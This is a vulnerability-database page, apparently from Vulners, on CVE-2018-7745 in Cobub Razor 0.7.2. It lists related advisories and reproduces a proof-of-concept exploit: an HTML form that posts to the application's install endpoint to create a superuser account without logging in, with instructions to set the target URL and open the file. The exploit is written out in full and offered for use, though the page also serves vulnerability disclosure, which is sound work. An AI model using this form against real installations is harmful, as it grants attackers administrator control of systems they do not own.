| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| Cobub Razor 0.7.2 - Add New Superuser Account Vulnerability | 9 Apr 201800:00 | – | zdt | |
| Cobub Razor Account Creation Vulnerability | 8 Mar 201800:00 | – | cnvd | |
| CVE-2018-7745 | 7 Mar 201817:00 | – | cve | |
| CVE-2018-7745 | 7 Mar 201817:00 | – | cvelist | |
| Cobub Razor 0.7.2 - Add New Superuser Account | 9 Apr 201800:00 | – | exploitpack | |
| CVE-2018-7745 | 7 Mar 201817:29 | – | nvd | |
| Cobub Razor 0.7.2 Add New Superuser Account | 9 Apr 201800:00 | – | packetstorm | |
| Design/Logic Flaw | 7 Mar 201817:29 | – | prion |
# Exploit Title: [Cobub Razor 0.7.2 Add New Superuser User]
# Date: [2018-03-07]
# Exploit Author: [ppb([email protected])]
# Vendor Homepage: [https://github.com/cobub/razor/]
# Software Link: [https://github.com/cobub/razor/]
# Version: [0.72]
# CVE : [CVE-2018-7745]
There is a vulnerability that can add an admnistrator user without login.
update the url and save to html ,then open it.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
<input type="hidden" name="siteurl" value="http://127.0.0.1/" />
<input type="hidden" name="superuser" value="test" />
<input type="hidden" name="pwd" value="test123" />
<input type="hidden" name="verifypassword" value="test123" />
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation